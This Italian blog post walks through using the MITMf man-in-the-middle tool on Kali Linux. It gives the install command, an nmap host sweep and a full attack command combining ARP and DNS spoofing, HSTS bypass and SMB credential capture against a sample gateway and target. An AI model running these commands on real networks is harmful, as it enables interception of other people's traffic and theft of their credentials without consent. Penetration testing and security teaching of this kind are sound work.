Home / Sicurezza Informatica / mitmf Man in the middle

mitmf Man in the middle

maninthemiddleattack

Ciao a tutti cari amici di iProg era da parecchio che non scrivevo un articolo, ma purtroppo sono stato molto occupato in questo periodo. Qualche tempo fa vi accennai in cosa consiste un attacco di tipo man in the middle, oggi vorrei mostrarvi un tool straordinario che si chiama mitmf ed è reperibile su github. Se avete una versione  di kali linux installata potete installare il tool semplicemente digitando all’interno del terminale il seguente comando:

apt-get install mitmf

A questo punto possiamo entrare in azione, quindi per prima cosa mappiamo il nostro network tramite l'utilizzo di nmap

nmap -sP -T4 192.168.1.1/24

Ora che abbiamo individuato il nostro target possiamo sferrare il nostro attacco, quindi la sintassi del comando è:

python mitmf.py  -i interfaccia  –hsts   –spoof –arp –dns    –gateway indirizzoDelGateway –target indirizzoDelTarget

Esempio

 python mitmf.py  -i eth1  –hsts   –spoof –arp –dns  –smbauth   –gateway 192.168.1.1 –target 192.168.1.4

Schermata 2015-05-13 alle 22.35.35

L’unica pecca di questo fantastico tool che funziona solo con alcuni tipi di browser tuttavia mi aspetto degli sviluppi interessanti in quanto il tool è ancora in fase di testing.

About Diego

Scroll To Top
Si prega di attivare i Javascript! / Please turn on Javascript!

Javaskripta ko calu karem! / Bitte schalten Sie Javascript!

S'il vous plaît activer Javascript! / Por favor, active Javascript!

Qing dakai JavaScript! / Qing dakai JavaScript!

Пожалуйста включите JavaScript! / Silakan aktifkan Javascript!